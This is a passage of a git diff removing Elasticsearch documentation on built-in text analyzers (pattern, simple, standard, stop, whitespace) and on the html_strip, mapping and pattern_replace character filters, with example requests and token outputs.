-| (?<=\d)(?=\D) # or number followed by non-number, -| (?<=[ \p{L} && [^\p{Lu}]]) # or lower case - (?=\p{Lu}) # followed by upper case, -| (?<=\p{Lu}) # or upper case - (?=\p{Lu} # followed by upper case - [\p{L}&&[^\p{Lu}]] # then lower case - ) --------------------------------------------------- -[discrete] -=== Definition - -The `pattern` analyzer consists of: - -Tokenizer:: -* <> - -Token Filters:: -* <> -* <> (disabled by default) - -If you need to customize the `pattern` analyzer beyond the configuration -parameters then you need to recreate it as a `custom` analyzer and modify -it, usually by adding token filters. This would recreate the built-in -`pattern` analyzer and you can use it as a starting point for further -customization: - -[source,console] ----------------------------------------------------- -PUT /pattern_example -{ - "settings": { - "analysis": { - "tokenizer": { - "split_on_non_word": { - "type": "pattern", - "pattern": "\\W+" <1> - } - }, - "analyzer": { - "rebuilt_pattern": { - "tokenizer": "split_on_non_word", - "filter": [ - "lowercase" <2> - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: pattern_example, first: pattern, second: rebuilt_pattern}\nendyaml\n/] -<1> The default pattern is `\W+` which splits on non-word characters -and this is where you'd change it. -<2> You'd add other token filters after `lowercase`. diff --git a/docs/reference/analysis/analyzers/simple-analyzer.asciidoc b/docs/reference/analysis/analyzers/simple-analyzer.asciidoc deleted file mode 100644 index 511d9d164d8..00000000000 --- a/docs/reference/analysis/analyzers/simple-analyzer.asciidoc +++ /dev/null @@ -1,150 +0,0 @@ -[[analysis-simple-analyzer]] -=== Simple analyzer -++++ -Simple -++++ - -The `simple` analyzer breaks text into tokens at any non-letter character, such -as numbers, spaces, hyphens and apostrophes, discards non-letter characters, -and changes uppercase to lowercase. - -[[analysis-simple-analyzer-ex]] -==== Example - -[source,console] ---- -POST _analyze -{ - "analyzer": "simple", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone."
-} ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "word", - "position": 2 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 5 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "word", - "position": 6 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog", - "start_offset": 45, - "end_offset": 48, - "type": "word", - "position": 8 - }, - { - "token": "s", - "start_offset": 49, - "end_offset": 50, - "type": "word", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "word", - "position": 10 - } - ] -} ----- -//// - -The `simple` analyzer parses the sentence and produces the following -tokens: - -[source,text] ----- -[ the, quick, brown, foxes, jumped, over, the, lazy, dog, s, bone ] ----- - -[[analysis-simple-analyzer-definition]] -==== Definition - -The `simple` analyzer is defined by one tokenizer: - -Tokenizer:: -* <> - -[[analysis-simple-analyzer-customize]] -==== Customize - -To customize the `simple` analyzer, duplicate it to create the basis for -a custom analyzer. This custom analyzer can be modified as required, usually by -adding token filters. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_simple_analyzer": { - "tokenizer": "lowercase", - "filter": [ <1> - ] - } - } - } - } -} ----- -<1> Add token filters here. \ No newline at end of file diff --git a/docs/reference/analysis/analyzers/standard-analyzer.asciidoc b/docs/reference/analysis/analyzers/standard-analyzer.asciidoc deleted file mode 100644 index 459d1098341..00000000000 --- a/docs/reference/analysis/analyzers/standard-analyzer.asciidoc +++ /dev/null @@ -1,302 +0,0 @@ -[[analysis-standard-analyzer]] -=== Standard analyzer -++++ -Standard -++++ - -The `standard` analyzer is the default analyzer which is used if none is -specified. It provides grammar based tokenization (based on the Unicode Text -Segmentation algorithm, as specified in -https://unicode.org/reports/tr29/[Unicode Standard Annex #29]) and works well -for most languages. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "analyzer": "standard", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." 
-} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "", - "position": 1 - }, - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "", - "position": 5 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "", - "position": 6 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "", - "position": 7 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "", - "position": 8 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ the, 2, quick, brown, foxes, jumped, over, the, lazy, dog's, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `standard` analyzer accepts the following parameters: - -[horizontal] -`max_token_length`:: - - The maximum token length. If a token is seen that exceeds this length then - it is split at `max_token_length` intervals. Defaults to `255`. - -`stopwords`:: - - A pre-defined stop words list like `_english_` or an array containing a - list of stop words. Defaults to `_none_`. - -`stopwords_path`:: - - The path to a file containing stop words. - -See the <> for more information -about stop word configuration. - - -[discrete] -=== Example configuration - -In this example, we configure the `standard` analyzer to have a -`max_token_length` of 5 (for demonstration purposes), and to use the -pre-defined list of English stop words: - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_english_analyzer": { - "type": "standard", - "max_token_length": 5, - "stopwords": "_english_" - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_english_analyzer", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." 
-} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "", - "position": 1 - }, - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "jumpe", - "start_offset": 24, - "end_offset": 29, - "type": "", - "position": 5 - }, - { - "token": "d", - "start_offset": 29, - "end_offset": 30, - "type": "", - "position": 6 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "", - "position": 7 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "", - "position": 9 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "", - "position": 10 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "", - "position": 11 - } - ] -} ----------------------------- - -///////////////////// - -The above example produces the following terms: - -[source,text] ---------------------------- -[ 2, quick, brown, foxes, jumpe, d, over, lazy, dog's, bone ] ---------------------------- - -[discrete] -=== Definition - -The `standard` analyzer consists of: - -Tokenizer:: -* <> - -Token Filters:: -* <> -* <> (disabled by default) - -If you need to customize the `standard` analyzer beyond the configuration -parameters then you need to recreate it as a `custom` analyzer and modify -it, usually by adding token filters. This would recreate the built-in -`standard` analyzer and you can use it as a starting point: - -[source,console] ----------------------------------------------------- -PUT /standard_example -{ - "settings": { - "analysis": { - "analyzer": { - "rebuilt_standard": { - "tokenizer": "standard", - "filter": [ - "lowercase" <1> - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: standard_example, first: standard, second: rebuilt_standard}\nendyaml\n/] -<1> You'd add any token filters after `lowercase`. diff --git a/docs/reference/analysis/analyzers/stop-analyzer.asciidoc b/docs/reference/analysis/analyzers/stop-analyzer.asciidoc deleted file mode 100644 index 5dc65268c7b..00000000000 --- a/docs/reference/analysis/analyzers/stop-analyzer.asciidoc +++ /dev/null @@ -1,276 +0,0 @@ -[[analysis-stop-analyzer]] -=== Stop analyzer -++++ -Stop -++++ - -The `stop` analyzer is the same as the <> -but adds support for removing stop words. It defaults to using the -`_english_` stop words. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "analyzer": "stop", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." 
-} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "word", - "position": 2 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 5 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog", - "start_offset": 45, - "end_offset": 48, - "type": "word", - "position": 8 - }, - { - "token": "s", - "start_offset": 49, - "end_offset": 50, - "type": "word", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "word", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ quick, brown, foxes, jumped, over, lazy, dog, s, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `stop` analyzer accepts the following parameters: - -[horizontal] -`stopwords`:: - - A pre-defined stop words list like `_english_` or an array containing a - list of stop words. Defaults to `_english_`. - -`stopwords_path`:: - - The path to a file containing stop words. This path is relative to the - Elasticsearch `config` directory. - - -See the <> for more information -about stop word configuration. - -[discrete] -=== Example configuration - -In this example, we configure the `stop` analyzer to use a specified list of -words as stop words: - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_stop_analyzer": { - "type": "stop", - "stopwords": ["the", "over"] - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_stop_analyzer", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." 
-} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "word", - "position": 2 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog", - "start_offset": 45, - "end_offset": 48, - "type": "word", - "position": 8 - }, - { - "token": "s", - "start_offset": 49, - "end_offset": 50, - "type": "word", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "word", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ quick, brown, foxes, jumped, lazy, dog, s, bone ] ---------------------------- - -[discrete] -=== Definition - -It consists of: - -Tokenizer:: -* <> - -Token filters:: -* <> - -If you need to customize the `stop` analyzer beyond the configuration -parameters then you need to recreate it as a `custom` analyzer and modify -it, usually by adding token filters. This would recreate the built-in -`stop` analyzer and you can use it as a starting point for further -customization: - -[source,console] ----------------------------------------------------- -PUT /stop_example -{ - "settings": { - "analysis": { - "filter": { - "english_stop": { - "type": "stop", - "stopwords": "_english_" <1> - } - }, - "analyzer": { - "rebuilt_stop": { - "tokenizer": "lowercase", - "filter": [ - "english_stop" <2> - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: stop_example, first: stop, second: rebuilt_stop}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> You'd add any token filters after `english_stop`. diff --git a/docs/reference/analysis/analyzers/whitespace-analyzer.asciidoc b/docs/reference/analysis/analyzers/whitespace-analyzer.asciidoc deleted file mode 100644 index 3af4f140b58..00000000000 --- a/docs/reference/analysis/analyzers/whitespace-analyzer.asciidoc +++ /dev/null @@ -1,149 +0,0 @@ -[[analysis-whitespace-analyzer]] -=== Whitespace analyzer -++++ -Whitespace -++++ - -The `whitespace` analyzer breaks text into terms whenever it encounters a -whitespace character. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "analyzer": "whitespace", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." 
-} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "word", - "position": 1 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 2 - }, - { - "token": "Brown-Foxes", - "start_offset": 12, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 5 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "word", - "position": 6 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "word", - "position": 8 - }, - { - "token": "bone.", - "start_offset": 51, - "end_offset": 56, - "type": "word", - "position": 9 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ The, 2, QUICK, Brown-Foxes, jumped, over, the, lazy, dog's, bone. ] ---------------------------- - -[discrete] -=== Configuration - -The `whitespace` analyzer is not configurable. - -[discrete] -=== Definition - -It consists of: - -Tokenizer:: -* <> - -If you need to customize the `whitespace` analyzer then you need to -recreate it as a `custom` analyzer and modify it, usually by adding -token filters. This would recreate the built-in `whitespace` analyzer -and you can use it as a starting point for further customization: - -[source,console] ----------------------------------------------------- -PUT /whitespace_example -{ - "settings": { - "analysis": { - "analyzer": { - "rebuilt_whitespace": { - "tokenizer": "whitespace", - "filter": [ <1> - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: whitespace_example, first: whitespace, second: rebuilt_whitespace}\nendyaml\n/] - -<1> You'd add any token filters here. diff --git a/docs/reference/analysis/anatomy.asciidoc b/docs/reference/analysis/anatomy.asciidoc deleted file mode 100644 index 22e7ffda667..00000000000 --- a/docs/reference/analysis/anatomy.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ -[[analyzer-anatomy]] -=== Anatomy of an analyzer - -An _analyzer_ -- whether built-in or custom -- is just a package which -contains three lower-level building blocks: _character filters_, -_tokenizers_, and _token filters_. - -The built-in <> pre-package these building -blocks into analyzers suitable for different languages and types of text. -Elasticsearch also exposes the individual building blocks so that they can be -combined to define new <> analyzers. - -[[analyzer-anatomy-character-filters]] -==== Character filters - -A _character filter_ receives the original text as a stream of characters and -can transform the stream by adding, removing, or changing characters. For -instance, a character filter could be used to convert Hindu-Arabic numerals -(٠‎١٢٣٤٥٦٧٨‎٩‎) into their Arabic-Latin equivalents (0123456789), or to strip HTML -elements like `` from the stream. - -An analyzer may have *zero or more* <>, -which are applied in order. 
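As an illustrative sketch (not part of the original text), the two transformations mentioned above can even be chained in a single `_analyze` request. The character filters run in the order they are listed, before the tokenizer ever sees the text:

[source,console]
----
GET /_analyze
{
  "tokenizer": "standard",
  "char_filter": [
    "html_strip", <1>
    {
      "type": "mapping", <2>
      "mappings": [ "٠ => 0", "١ => 1", "٢ => 2" ]
    }
  ],
  "text": "<b>٢١٠</b>"
}
----
<1> First strips the `<b>` element.
<2> Then maps the remaining Hindu-Arabic numerals, so the tokenizer receives `210` and emits it as a single token.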
- -[[analyzer-anatomy-tokenizer]] -==== Tokenizer - -A _tokenizer_ receives a stream of characters, breaks it up into individual -_tokens_ (usually individual words), and outputs a stream of _tokens_. For -instance, a <> tokenizer breaks -text into tokens whenever it sees any whitespace. It would convert the text -`"Quick brown fox!"` into the terms `[Quick, brown, fox!]`. - -The tokenizer is also responsible for recording the order or _position_ of -each term and the start and end _character offsets_ of the original word which -the term represents. - -An analyzer must have *exactly one* <>. - -[[analyzer-anatomy-token-filters]] -==== Token filters - -A _token filter_ receives the token stream and may add, remove, or change -tokens. For example, a <> token -filter converts all tokens to lowercase, a -<> token filter removes common words -(_stop words_) like `the` from the token stream, and a -<> token filter introduces synonyms -into the token stream. - -Token filters are not allowed to change the position or character offsets of -each token. - -An analyzer may have *zero or more* <>, -which are applied in order. \ No newline at end of file diff --git a/docs/reference/analysis/charfilters.asciidoc b/docs/reference/analysis/charfilters.asciidoc deleted file mode 100644 index 97fe4fd266b..00000000000 --- a/docs/reference/analysis/charfilters.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[[analysis-charfilters]] -== Character filters reference - -_Character filters_ are used to preprocess the stream of characters before it -is passed to the <>. - -A character filter receives the original text as a stream of characters and -can transform the stream by adding, removing, or changing characters. For -instance, a character filter could be used to convert Hindu-Arabic numerals -(٠‎١٢٣٤٥٦٧٨‎٩‎) into their Arabic-Latin equivalents (0123456789), or to strip HTML -elements like `` from the stream. - - -Elasticsearch has a number of built in character filters which can be used to build -<>. - -<>:: - -The `html_strip` character filter strips out HTML elements like `` and -decodes HTML entities like `&`. - -<>:: - -The `mapping` character filter replaces any occurrences of the specified -strings with the specified replacements. - -<>:: - -The `pattern_replace` character filter replaces any characters matching a -regular expression with the specified replacement. - -include::charfilters/htmlstrip-charfilter.asciidoc[] - -include::charfilters/mapping-charfilter.asciidoc[] - -include::charfilters/pattern-replace-charfilter.asciidoc[] diff --git a/docs/reference/analysis/charfilters/htmlstrip-charfilter.asciidoc b/docs/reference/analysis/charfilters/htmlstrip-charfilter.asciidoc deleted file mode 100644 index 237339d9744..00000000000 --- a/docs/reference/analysis/charfilters/htmlstrip-charfilter.asciidoc +++ /dev/null @@ -1,130 +0,0 @@ -[[analysis-htmlstrip-charfilter]] -=== HTML strip character filter -++++ -HTML strip -++++ - -Strips HTML elements from a text and replaces HTML entities with their decoded -value (e.g, replaces `&` with `&`). - -The `html_strip` filter uses Lucene's -{lucene-analysis-docs}/charfilter/HTMLStripCharFilter.html[HTMLStripCharFilter]. - -[[analysis-htmlstrip-charfilter-analyze-ex]] -==== Example - -The following <> request uses the -`html_strip` filter to change the text `
<p>I&apos;m so <b>happy</b>!</p>
` to -`\nI'm so happy!\n`. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "keyword", - "char_filter": [ - "html_strip" - ], - "text": "
<p>I&apos;m so <b>happy</b>!</p>
" -} ----- - -The filter produces the following text: - -[source,text] ----- -[ \nI'm so happy!\n ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "\nI'm so happy!\n", - "start_offset": 0, - "end_offset": 32, - "type": "word", - "position": 0 - } - ] -} ----- -//// - -[[analysis-htmlstrip-charfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`html_strip` filter to configure a new -<>. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "char_filter": [ - "html_strip" - ] - } - } - } - } -} ----- - -[[analysis-htmlstrip-charfilter-configure-parms]] -==== Configurable parameters - -`escaped_tags`:: -(Optional, array of strings) -Array of HTML elements without enclosing angle brackets (`< >`). The filter -skips these HTML elements when stripping HTML from the text. For example, a -value of `[ "p" ]` skips the `
<p>
` HTML element. - -[[analysis-htmlstrip-charfilter-customize]] -==== Customize - -To customize the `html_strip` filter, duplicate it to create the basis for a new -custom character filter. You can modify the filter using its configurable -parameters. - -The following <> request -configures a new <> using a custom -`html_strip` filter, `my_custom_html_strip_char_filter`. - -The `my_custom_html_strip_char_filter` filter skips the removal of the `` -HTML element. - -[source,console] ----- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "char_filter": [ - "my_custom_html_strip_char_filter" - ] - } - }, - "char_filter": { - "my_custom_html_strip_char_filter": { - "type": "html_strip", - "escaped_tags": [ - "b" - ] - } - } - } - } -} ----- diff --git a/docs/reference/analysis/charfilters/mapping-charfilter.asciidoc b/docs/reference/analysis/charfilters/mapping-charfilter.asciidoc deleted file mode 100644 index b1f2f0900dc..00000000000 --- a/docs/reference/analysis/charfilters/mapping-charfilter.asciidoc +++ /dev/null @@ -1,173 +0,0 @@ -[[analysis-mapping-charfilter]] -=== Mapping character filter -++++ -Mapping -++++ - -The `mapping` character filter accepts a map of keys and values. Whenever it -encounters a string of characters that is the same as a key, it replaces them -with the value associated with that key. - -Matching is greedy; the longest pattern matching at a given point wins. -Replacements are allowed to be the empty string. - -The `mapping` filter uses Lucene's -{lucene-analysis-docs}/charfilter/MappingCharFilter.html[MappingCharFilter]. - -[[analysis-mapping-charfilter-analyze-ex]] -==== Example - -The following <> request uses the `mapping` filter -to convert Hindu-Arabic numerals (٠‎١٢٣٤٥٦٧٨‎٩‎) into their Arabic-Latin -equivalents (0123456789), changing the text `My license plate is ٢٥٠١٥` to -`My license plate is 25015`. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "keyword", - "char_filter": [ - { - "type": "mapping", - "mappings": [ - "٠ => 0", - "١ => 1", - "٢ => 2", - "٣ => 3", - "٤ => 4", - "٥ => 5", - "٦ => 6", - "٧ => 7", - "٨ => 8", - "٩ => 9" - ] - } - ], - "text": "My license plate is ٢٥٠١٥" -} ----- - -The filter produces the following text: - -[source,text] ----- -[ My license plate is 25015 ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "My license plate is 25015", - "start_offset": 0, - "end_offset": 25, - "type": "word", - "position": 0 - } - ] -} ----- -//// - -[[analysis-mapping-charfilter-configure-parms]] -==== Configurable parameters - -`mappings`:: -(Required*, array of strings) -Array of mappings, with each element having the form `key => value`. -+ -Either this or the `mappings_path` parameter must be specified. - -`mappings_path`:: -(Required*, string) -Path to a file containing `key => value` mappings. -+ -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each mapping in the file must be separated by a line -break. -+ -Either this or the `mappings` parameter must be specified. - -[[analysis-mapping-charfilter-customize]] -==== Customize and add to an analyzer - -To customize the `mappings` filter, duplicate it to create the basis for a new -custom character filter. You can modify the filter using its configurable -parameters. - -The following <> request -configures a new <> using a custom -`mappings` filter, `my_mappings_char_filter`. 
- -The `my_mappings_char_filter` filter replaces the `:)` and `:(` emoticons -with a text equivalent. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "char_filter": [ - "my_mappings_char_filter" - ] - } - }, - "char_filter": { - "my_mappings_char_filter": { - "type": "mapping", - "mappings": [ - ":) => _happy_", - ":( => _sad_" - ] - } - } - } - } -} ----- - -The following <> request uses the custom -`my_mappings_char_filter` to replace `:(` with `_sad_` in -the text `I'm delighted about it :(`. - -[source,console] ----- -GET /my-index-000001/_analyze -{ - "tokenizer": "keyword", - "char_filter": [ "my_mappings_char_filter" ], - "text": "I'm delighted about it :(" -} ----- -// TEST[continued] - -The filter produces the following text: - -[source,text] ---------------------------- -[ I'm delighted about it _sad_ ] ---------------------------- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "I'm delighted about it _sad_", - "start_offset": 0, - "end_offset": 25, - "type": "word", - "position": 0 - } - ] -} ----- -//// diff --git a/docs/reference/analysis/charfilters/pattern-replace-charfilter.asciidoc b/docs/reference/analysis/charfilters/pattern-replace-charfilter.asciidoc deleted file mode 100644 index 7951cfec972..00000000000 --- a/docs/reference/analysis/charfilters/pattern-replace-charfilter.asciidoc +++ /dev/null @@ -1,267 +0,0 @@ -[[analysis-pattern-replace-charfilter]] -=== Pattern replace character filter -++++ -Pattern replace -++++ - -The `pattern_replace` character filter uses a regular expression to match -characters which should be replaced with the specified replacement string. -The replacement string can refer to capture groups in the regular expression. - -[WARNING] -.Beware of Pathological Regular Expressions -======================================== - -The pattern replace character filter uses -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java Regular Expressions]. - -A badly written regular expression could run very slowly or even throw a -StackOverflowError and cause the node it is running on to exit suddenly. - -Read more about https://www.regular-expressions.info/catastrophic.html[pathological regular expressions and how to avoid them]. - -======================================== - -[discrete] -=== Configuration - -The `pattern_replace` character filter accepts the following parameters: - -[horizontal] -`pattern`:: - - A https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java regular expression]. Required. - -`replacement`:: - - The replacement string, which can reference capture groups using the - `$1`..`$9` syntax, as explained - https://docs.oracle.com/javase/8/docs/api/java/util/regex/Matcher.html#appendReplacement-java.lang.StringBuffer-java.lang.String-[here]. - -`flags`:: - - Java regular expression https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html#field.summary[flags]. - Flags should be pipe-separated, eg `"CASE_INSENSITIVE|COMMENTS"`. 
- -[discrete] -=== Example configuration - -In this example, we configure the `pattern_replace` character filter to -replace any embedded dashes in numbers with underscores, i.e `123-456-789` -> -`123_456_789`: - -[source,console] ----------------------------- -PUT my-index-00001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "char_filter": [ - "my_char_filter" - ] - } - }, - "char_filter": { - "my_char_filter": { - "type": "pattern_replace", - "pattern": "(\\d+)-(?=\\d)", - "replacement": "$1_" - } - } - } - } -} - -POST my-index-00001/_analyze -{ - "analyzer": "my_analyzer", - "text": "My credit card is 123-456-789" -} ----------------------------- -// TEST[s/\$1//] -// the test framework doesn't like the $1 so we just throw it away rather than -// try to get it to work properly. At least we are still testing the charfilter. - -The above example produces the following terms: - -[source,text] ---------------------------- -[ My, credit, card, is, 123_456_789 ] ---------------------------- - -WARNING: Using a replacement string that changes the length of the original -text will work for search purposes, but will result in incorrect highlighting, -as can be seen in the following example. - -This example inserts a space whenever it encounters a lower-case letter -followed by an upper-case letter (i.e. `fooBarBaz` -> `foo Bar Baz`), allowing -camelCase words to be queried individually: - -[source,console] ----------------------------- -PUT my-index-00001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "char_filter": [ - "my_char_filter" - ], - "filter": [ - "lowercase" - ] - } - }, - "char_filter": { - "my_char_filter": { - "type": "pattern_replace", - "pattern": "(?<=\\p{Lower})(?=\\p{Upper})", - "replacement": " " - } - } - } - }, - "mappings": { - "properties": { - "text": { - "type": "text", - "analyzer": "my_analyzer" - } - } - } -} - -POST my-index-00001/_analyze -{ - "analyzer": "my_analyzer", - "text": "The fooBarBaz method" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "foo", - "start_offset": 4, - "end_offset": 6, - "type": "", - "position": 1 - }, - { - "token": "bar", - "start_offset": 7, - "end_offset": 9, - "type": "", - "position": 2 - }, - { - "token": "baz", - "start_offset": 10, - "end_offset": 13, - "type": "", - "position": 3 - }, - { - "token": "method", - "start_offset": 14, - "end_offset": 20, - "type": "", - "position": 4 - } - ] -} ----------------------------- - -///////////////////// - -The above returns the following terms: - -[source,text] ----------------------------- -[ the, foo, bar, baz, method ] ----------------------------- - -Querying for `bar` will find the document correctly, but highlighting on the -result will produce incorrect highlights, because our character filter changed -the length of the original text: - -[source,console] ----------------------------- -PUT my-index-00001/_doc/1?refresh -{ - "text": "The fooBarBaz method" -} - -GET my-index-00001/_search -{ - "query": { - "match": { - "text": "bar" - } - }, - "highlight": { - "fields": { - "text": {} - } - } -} ----------------------------- -// TEST[continued] - -The output from the above is: - -[source,console-result] ----------------------------- -{ - "timed_out": false, - "took": $body.took, - 
